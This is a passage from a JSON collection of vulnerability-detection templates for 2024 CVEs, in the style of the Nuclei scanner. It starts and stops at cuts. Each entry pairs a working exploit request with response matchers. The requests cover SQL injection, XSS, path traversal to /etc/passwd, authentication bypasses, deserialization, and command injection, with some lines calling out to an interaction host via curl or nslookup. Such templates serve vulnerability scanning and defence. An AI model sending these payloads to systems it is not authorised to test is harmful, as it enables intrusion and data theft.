200"],"condition":"and"}]}]},{"id":"CVE-2024-1698","info":{"name":"NotificationX <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-json/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"nx_id\": \"1\",\"type\": \"clicks`=1 and 1=sleep(5)-- -\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"{\\\"success\\\":true}\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-25669","info":{"name":"CaseAware a360inc - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value='test' draggable=true ondrag=alert(document.domain)","CaseAware"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28397","info":{"name":"pyload-ng js2py - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npackage=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//{{interactsh-url}}%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Could not decrypt key"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-38514","info":{"name":"NextChat - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["__NEXT_DATA__"]}]}]},{"id":"CVE-2024-30188","info":{"name":"Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write","severity":"high"},"requests":[{"raw":["POST /dolphinscheduler/login HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&userPassword={{password}}&ssoLoginUrl="],"extractors":[{"type":"json","name":"sessionId","part":"body","json":[".data.sessionId"],"internal":true}]},{"raw":["GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd  HTTP/1.1\nHost: {{Hostname}}\nsessionId: {{sessionId}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6928","info":{"name":"Opti Marketing <= 2.0.9 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/opti-marketing\")"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=save_article&postId=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6188","info":{"name":"TrakSYS 11.x.x - Sensitive Data Exposure","severity":"medium"},"requests":[{"raw":["GET /TS/export/pagedefinition?ID=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["TrakSYS Version","Name","Altname"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2879","info":{"name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"],"matchers":[{"type":"word","internal":true,"words":[".ls-clearfix:before"]}]},{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"<script>\")"],"condition":"and"}]}]},{"id":"CVE-2024-0204","info":{"name":"Fortra GoAnywhere MFT - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Create an administrator account","goanywhere"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29059","info":{"name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","severity":"high"},"requests":[{"raw":["GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1\nHost: {{Hostname}}\n__RequestVerb: POST\nContent-Type: text/xml\n","POST {{objref}} HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml\n\n<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<a1:TextFormattingRunProperties id=\"ref-1\" xmlns:a1=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35\">\n<ForegroundBrush id=\"ref-3\">&#60;ObjectDataProvider MethodName=&#34;AddHeader&#34;\n  xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;\n  xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;\n  xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;\n  xmlns:System.Web=&#34;clr-namespace:System.Web;assembly=System.Web&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;&#60;ObjectDataProvider MethodName=&#34;get_Response&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider ObjectType=&#34;{x:Type System.Web:HttpContext}&#34; MethodName=&#34;get_Current&#34; /&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;/ObjectDataProvider&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider.MethodParameters&#62;\n  &#60;System:String&#62;X-Vuln-Test&#60;/System:String&#62;\n  &#60;System:String&#62;{{randstr}}&#60;/System:String&#62;\n  &#60;/ObjectDataProvider.MethodParameters&#62;\n&#60;/ObjectDataProvider&#62;</ForegroundBrush>\n</a1:TextFormattingRunProperties>\n</SOAP-ENV:Envelope>\n"],"extractors":[{"type":"regex","name":"objref","part":"body_1","group":1,"regex":["(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"],"internal":true},{"type":"dsl","dsl":["x_vuln_test"]}],"matchers":[{"type":"dsl","dsl":["contains(body_1,'ObjRef')","contains(x_vuln_test,'{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2024-41107","info":{"name":"Apache CloudStack - SAML Signature Exclusion","severity":"critical"},"requests":[{"raw":["POST /client/api?command=samlSso HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nRelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header,'sessionkey')","contains(content_type,'text/xml')","status_code==302"],"condition":"and"}]}]},{"id":"CVE-2024-5488","info":{"name":"SEOPress < 7.9 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["Sorry, you are not allowed to do that."],"internal":true}]},{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':aaaaaa')}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{marker}}&description={{marker}}\n"],"matchers":[{"type":"word","part":"body","words":["\"code\":\"success\""],"internal":true}]},{"raw":["GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"title\":\"{{marker}}\",\"description\":\"{{marker}}\""]}]}]},{"id":"CVE-2024-37393","info":{"name":"SecurEnvoy Two Factor Authentication - LDAP Injection","severity":"critical"},"requests":[{"raw":["POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:{{userid}})(sAMAccountName=*\nMEMBEROF:Domain Users\n","POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:*)(sAMAccountName=*\nMEMBEROF:Domain Users\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Error checking Group')","status_code_1 == 200","contains(body_2, 'GETPASSCODE')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-24565","info":{"name":"CrateDB Database - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"CREATE TABLE {{table_name}}(info_leak STRING)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"SELECT * FROM {{table_name}} limit 100\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_3)","contains_all(header, 'application/json')","status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-49757","info":{"name":"Zitadel - User Registration Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/login/register"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Registration is not allowed (Internal)"],"negative":true},{"type":"word","part":"body","words":["Enter your Userdata","zitadel"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45440","info":{"name":"Drupal 11.x-dev - Full Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/core/authorize.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["getHashSalt","RuntimeException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25735","info":{"name":"WyreStorm Apollo VX20 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/device/config"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"password\":","\"softAp\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4443","info":{"name":"Business Directory Plugin <= 6.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"Business Directory\",\"No listings found\")"],"condition":"and"}]}]},{"id":"CVE-2024-29868","info":{"name":"Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/v2/auth/settings"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"settings","group":1,"json":["if .allowPasswordRecovery==true and .allowSelfRegistration==true then true else false end"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/openapi.json"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"version","group":1,"json":[".info.version"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains(settings, true)","compare_versions(version, '>= 0.69.0') && compare_versions(version, '<= 0.93.0')"],"condition":"and"}]}]},{"id":"CVE-2024-3400","info":{"name":"GlobalProtect - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n","POST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: {{Hostname}}\nCookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;\nContent-Type: application/x-www-form-urlencoded\n\nuser=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global\n","GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_3 == 403","contains(body_2, 'invalid required input parameters')"],"condition":"and"}]}]},{"id":"CVE-2024-33575","info":{"name":"User Meta WP Plugin < 3.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"um-debug<br/>\")"],"condition":"and"}]}]},{"id":"CVE-2024-38816","info":{"name":"WebMvc.fn/WebFlux.fn - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/link/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39713","info":{"name":"Rocket.Chat - Server-Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"From\": \"5551123456782\",\n  \"To\": \"5551987654323\",\n  \"Body\": \"SMS message\",\n  \"NumMedia\": 1,\n  \"MediaUrl0\":\"http://{{interactsh-url}}\",\n  \"MediaContentType0\":\"application/json\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Response></Response>"]},{"type":"word","part":"content_type","words":["text/xml"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-45488","info":{"name":"SafeGuard for Privileged Passwords < 7.5.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RSTS/UserLogin/LoginController?response_type=token&redirect_uri=https%3A%2F%2Flocalhost&loginRequestStep=6&csrfTokenTextbox=aaa"],"headers":{"Cookie":"CsrfToken=aaa; stsIdentity0={{code_response}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["access_token=","RelyingPartyUrl"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1709","info":{"name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SetupWizard.aspx/{{string}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SetupWizardPage","ContentPanel SetupWizard"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","part":"header","kval":["Server"]}]}]},{"id":"CVE-2024-0305","info":{"name":"Ncast busiFacade - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /classes/common/busiFacade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"name\":\"ping\",\"serviceName\":\"SysManager\",\"userTransaction\":false,\"param\":[\"ping 127.0.0.1 | id\"]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","#str"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31850","info":{"name":"CData Arc < 23.4.8839 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData Arc"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9463","info":{"name":"PaloAlto Networks Expedition - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /API/convertCSVtoParquet.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nram=watchTowr`curl+{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Undefined index: taskID"]}]}]},{"id":"CVE-2024-22320","info":{"name":"IBM Operational Decision Manager - Java Deserialization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["javax.servlet.ServletException"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-32651","info":{"name":"Change Detection - Server Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/"],"redirects":true,"max-redirects":2,"extractors":[{"type":"xpath","name":"version","internal":true,"xpath":["//*[@id=\"right-sticky\"]"]}],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","part":"body","words":["Change Detection"],"condition":"and"},{"type":"dsl","dsl":["compare_versions(version, '<= 0.45.20')"]}]}]},{"id":"CVE-2024-6586","info":{"name":"Lightdash v0.1024.6 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /api/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n"]},{"raw":["GET /api/v1/org/projects HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"projectuuid","part":"body","json":[".results[0].projectUuid"],"internal":true}]},{"raw":["POST /api/v1/projects/{{projectuuid}}/dashboards HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\":\"Test\",\"description\":\"Test\",\"tiles\":[]}\n"],"extractors":[{"type":"json","name":"dashuuid","part":"body","json":[".results.uuid"],"internal":true}]},{"raw":["PATCH /api/v1/dashboards/{{dashuuid}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"tiles\":[{\"uuid\":\"00000000-0000-0000-0000-000000000000\",\"x\":0,\"y\":0,\"h\":9,\"w\":15,\"type\":\"markdown\",\"properties\":{\"title\":\"title\",\"hideTitle\":false,\"content\":\"<iframe src=\\\"http://{{interactsh-url}}\\\">frame</iframe>\\n\\n<img src=\\\"http://{{interactsh-url}}\\\">img</img>\\n\"}}],\"filters\":{\"dimensions\":[],\"metrics\":[],\"tableCalculations\":[]},\"name\":\"my dashboard\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"status\":\"ok\""],"internal":true}]},{"raw":["POST /api/v1/dashboards/{{dashuuid}}/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"queryFilters\":\"\",\"gridWidth\":1400}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\")","contains(interactsh_request, \"connect.sid=\")","contains(body, \"status\\\":\\\"ok\")"],"condition":"and"}]}]},{"id":"CVE-2024-39914","info":{"name":"FOG Project < 1.5.10.34 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfogguiuser=fog&nojson=2\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"No HTML files!\",\"HTMLDOC\")","contains(content_type, \"application/pdf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /management/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4879","info":{"name":"ServiceNow UI Macros - Template Injection","severity":"unknown"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j=\"jelly\"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class=\"outputmsg_text\">1787569</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9465","info":{"name":"Palo Alto Expedition - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get&type=existing_ruleBases&project=pandbRBAC\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"ruleBasesNames\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(6)))test)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-29973","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /cmd,/simZysh/register_main/setCookie HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"c0\"\n\nstorage_ext_cgi CGIGetExtStoInfo None) and False or __import__(\"subprocess\").check_output(\"echo {{string}}\", shell=True)#\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'errmsg0\": \"OK')","contains(header, 'application/json')","contains(body, '{{string}}')"],"condition":"and"}]}]},{"id":"CVE-2024-5522","info":{"name":"WordPress HTML5 Video Player < 2.5.27 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6095","info":{"name":"LocalAI - Partial Local File Read","severity":"medium"},"requests":[{"raw":["POST /models/apply HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"url\":\"file:///etc/passwd\"}\n"],"extractors":[{"type":"json","part":"body","name":"uuid","internal":true,"json":[".uuid"]}]},{"raw":["GET /models/jobs/{{uuid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[": cannot unmarshal !!str `root:x:...`"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29824","info":{"name":"Ivanti EPM - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /WSStatusEvents/EventHandler.asmx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap12:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap12=\"http://www.w3.org/2003/05/soap-envelope\">\n  <soap12:Body>\n    <UpdateStatusEvents xmlns=\"http://tempuri.org/\">\n      <deviceID>string</deviceID>\n      <actions>\n        <Action name=\"string\" code=\"0\" date=\"0\" type=\"96\" user=\"string\" configguid=\"string\" location=\"string\">\n          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--</status>\n        </Action>\n      </actions>\n    </UpdateStatusEvents>\n  </soap12:Body>\n</soap12:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/soap+xml"]},{"type":"word","part":"body","words":["UpdateStatusEventsResponse"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23334","info":{"name":"aiohttp - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["aiohttp","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31982","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20","{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"],"skip-variables-check":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Hello from search text:42</title>\", \"<title>RSS feed\")","contains(header, \"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-44849","info":{"name":"Qualitor <= 8.24 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"idtipo\"\n\n2\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmdiretoriorede\"\n\n.\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmbucket\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmaccesskey\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; 